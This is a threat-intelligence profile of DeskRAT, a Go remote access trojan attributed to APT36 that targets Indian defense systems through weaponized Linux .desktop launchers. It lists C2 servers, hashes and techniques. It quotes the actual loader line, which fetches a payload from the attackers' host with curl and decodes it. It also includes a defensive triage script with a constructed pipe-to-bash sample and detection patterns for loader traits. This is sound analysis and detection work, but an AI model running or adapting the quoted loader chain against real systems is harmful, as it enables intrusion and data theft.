DeskRAT
DeskRAT is a Golang-based remote access trojan associated with Pakistan-linked Transparent Tribe/APT36 (also tracked as Mythic Leopard) and used in espionage campaigns targeting Indian government, military, defense-related, and other strategic entities. Reporting describes it primarily as a Linux-focused implant targeting BOSS Linux environments, though related reporting also references delivery via rogue PowerPoint Add-In files and mentions related Windows tooling/variants in the same campaign cluster.
Observed delivery includes spear-phishing and social engineering using malicious ZIP attachments or links, weaponized freedesktop .desktop launchers, and contract- or government-themed lures. One documented Linux chain used an oversized malicious .desktop file named MoD_letter_update.desktop that abused the Exec= field and a triple-decoding bash loader (base64, xxd -r -p, and base64) to fetch an ASCII85-encoded, bzip2-compressed ELF payload from bossmaya[.]xyz/download.php?file=client.txt, write it under /tmp/.wAhJmE-<8-hex>, and execute it. Other reporting states malicious Desktop files displayed decoy PDFs while retrieving payloads from modgovindia[.]com, and that campaigns also used ZIP archives or cloud-hosted archives.
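A .desktop triage routine written for this page as an added example (not code from any of the cited reports): it pulls the Exec= value from a launcher, flags the loader traits described above, and reverses the base64 → hex → base64 wrapping on any embedded blob so an analyst can read the inner command without running it. The sample launcher, its benign inner command and the 64 KB size threshold are constructed assumptions.

```python
import base64
import re

# Constructed sample launcher (not the real MoD_letter_update.desktop): a benign
# inner command wrapped the same way (base64 -> hex -> base64) so the decoder has work to do.
INNER_CMD = b"echo hello"
_wrapped = base64.b64encode(base64.b64encode(INNER_CMD).hex().encode()).decode()
SAMPLE_DESKTOP = f"""[Desktop Entry]
Type=Application
Icon=document
Exec=bash -c "echo {_wrapped} | base64 -d | xxd -r -p | base64 -d | bash"
"""

# Loader traits described in the reporting, as regexes over the Exec= value.
SUSPICIOUS = [
    (r"base64\s+-d", "inline base64 decode"),
    (r"xxd\s+-r\s+-p", "hex decode layer"),
    (r"a85decode", "ASCII85 decode"),
    (r"bzip2\s+-d", "bzip2 decompress"),
    (r"\b(curl|wget)\b", "network fetch"),
    (r"/tmp/\.", "dotfile drop under /tmp"),
    (r"\|\s*(ba)?sh\b", "pipe to shell"),
]

def parse_exec(text: str) -> str:
    """Return the Exec= value of a .desktop file, or '' if there is none."""
    for line in text.splitlines():
        if line.startswith("Exec="):
            return line[5:].strip()
    return ""

def triple_decode(token: str):
    """Undo the base64 -> hex -> base64 wrapping on one token; None if it is not such a blob."""
    try:
        hexed = base64.b64decode(token, validate=True).decode()
        return base64.b64decode(bytes.fromhex(hexed), validate=True).decode()
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None

def triage(text: str) -> dict:
    """Flag loader traits in the Exec= line and recover any wrapped inner command."""
    exec_line = parse_exec(text)
    findings = [label for pat, label in SUSPICIOUS if re.search(pat, exec_line)]
    tokens = re.findall(r"[A-Za-z0-9+/=]{16,}", exec_line)
    decoded = [d for d in map(triple_decode, tokens) if d is not None]
    # The documented launcher was ~1.4 MB because of an embedded icon and an unused padding blob.
    return {"exec": exec_line, "findings": findings, "decoded": decoded,
            "oversized": len(text.encode()) > 64 * 1024}
```

Run `triage()` over each Exec= value harvested from user autostart and download directories; the `decoded` field exposes what a wrapped command would have run.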
The Linux DeskRAT payload has been described as a statically linked stripped Linux x86_64 Go executable built with Go 1.24.3, with SHA-256 d62ad76a9841e710ce783c4f8313f134a1e6a726eb5b441b9cd49c7ae14b251a and Go Build ID 1a8d3756d7be400949824cee9462fb2cbac79106. The binary reportedly leaked compile-time paths including D:/bossmaya/our/newlinuxblkul/client/main.go and C:/Users/hp/go/pkg/mod/, indicating cross-compilation from a Windows host. Dependencies observed in the sample include github.com/gorilla/websocket@v1.5.0 and github.com/google/uuid@v1.3.0.
DeskRAT establishes command-and-control over WebSockets. Reported infrastructure includes 85.137.249[.]224:8080/ws, with Host-header-routed domains chuchuchacha[.]shop, chuchuchacha[.]xyz, makiinindia[.]xyz, and makiinindia[.]online, as well as prior or related infrastructure at 85.137.249[.]243 and 45.90.97[.]211. Another campaign cluster used modgovindia[.]space:4000 for encrypted HTTP POST exfiltration in a related Linux variant. The C2 server was observed returning a JSON welcome frame containing the text "Welcome to Stealth Server."
Capabilities attributed to DeskRAT and closely related Linux variants include persistence, remote command execution, file browsing and file collection/exfiltration, additional payload execution, heartbeat/ping handling, and multiple persistence mechanisms such as systemd, cron, autostart, and .bashrc modification. Reporting also characterizes DeskRAT as supporting data exfiltration and deployment of additional payloads. The malware is part of Transparent Tribe/APT36’s broader cross-platform malware evolution and has been described alongside other family names used by the actor, including Crimson RAT, CapraRAT, ElizaRAT, Geta RAT, Ares RAT, and Poseidon.
Groups observed using it
3 distinct threat actors attributed by public researchers.
Once executed, the malicious .desktop launcher initiates a heavily obfuscated shell-based infection chain involving staged payload retrieval, inline decoding routines, and deployment of a Golang-based ELF implant tracked in this report as DeskRAT.
Pakistan-Linked TransparentTribe APT Deploys AI-Assisted DeskRAT Malware Against India’s BOSS Linux Systems
The campaigns are characterized by the use of malware families like Geta RAT, Ares RAT, and DeskRAT...
Techniques & procedures
15 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
The disclosure comes as details have emerged of a targeted phishing operation leveraging weaponized Linux .desktop files to target the Indian military infrastructure using contract-related lures associated with Indian-armored vehicle procurement operations.
The current lure is themed as Ministry of Defence procurement of indigenous trawl assemblies for T-72 and T-90 main battle tanks ... a plausible-enough artifact for a defense-contracting inbox to open without hesitation.
Execution
5 techniques
Once executed, the malicious .desktop launcher initiates a heavily obfuscated shell-based infection chain involving staged payload retrieval, inline decoding routines, and deployment of a Golang-based ELF implant tracked in this report as DeskRAT.
"DeskRAT is delivered via a rogue PowerPoint Add-In file that runs an embedded macro to establish outbound communication with a remote server to fetch the malware."
curl ${YAiuradJ} ${JOsQTdyK} | python3 -c 'import base64,sys; sys.stdout.buffer.write(base64.a85decode(sys.stdin.read()))' | bzip2 -d
APT36 ... is running an active Linux-targeted campaign ... delivered through abuse of the freedesktop .desktop file format with a triple-encoded bash loader.
Stealth
3 techniques
The DeskRAT payload's ASCII85+bzip2 delivery mechanism, the decoded triple-encoded bash loader (base64 → xxd -r -p → base64) ...
The root of the infection chain is a 1.4 MB .desktop file, MoD_letter_update.desktop ... a 500 KB base64-encoded PNG icon (so the launcher displays a convincing document icon to the victim), and a much larger base64-encoded .pdf-looking block that's actually unused data
the client-side /tmp/.wAhJmE-<md5> randomized drop path ... The randomized drop path (/tmp/.wAhJmE-<md5>) and the dotfile prefix keep the payload hidden from ls without -a
Discovery
1 technique
"Geta RAT supports various commands to collect system information, enumerate running processes..."
Command and Control
3 techniques
The C2 protocol WebSocket (ws:// over TCP/8080), gorilla/websocket implementation ... Sending a WebSocket upgrade ... all complete the handshake and receive a server-initiated JSON frame on connection
The command-and-control channel is a WebSocket endpoint on 85.137.249[.]224:8080/ws ... The agent's runtime behavior is: dial wss://<c2>:8080/ws, register with a UUIDv4 session identifier prefixed cxx-, send heartbeats, and handle RPC messages over the WebSocket channel.
Decoded, the command is plain: ... curl ... "https://" "bossmaya.xyz/download.php?file=client.txt" | python3 -c 'import base64,sys; sys.stdout.buffer.write(base64.a85decode(sys.stdin.read()))' | bzip2 -d
Other
1 technique
IOCs tracked for this family
22 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
12 sources tracked across advisories, community write-ups, and news.
A Golang-based ELF implant deployed through weaponized Linux .desktop files in a phishing campaign targeting Indian military and defense infrastructure via staged shell payload delivery.
A Go-based Linux stealer-RAT delivered via a malicious .desktop launcher and triple-encoded bash loader. The payload is fetched from a remote server, decoded from ASCII85 and bzip2, dropped into /tmp, then executed. The implant uses WebSocket C2 and is described as supporting standard RAT functions such as file listing, upload/download, command execution, heartbeats, and session registration.
Remote access trojan used in campaigns targeting the Indian defense sector and government-aligned organizations; used to steal sensitive data and maintain access.
Golang RAT delivered via a malicious PowerPoint Add-In (macro-enabled) that establishes outbound communication to fetch the payload. Used for stealthy, persistent, long-term access in espionage campaigns.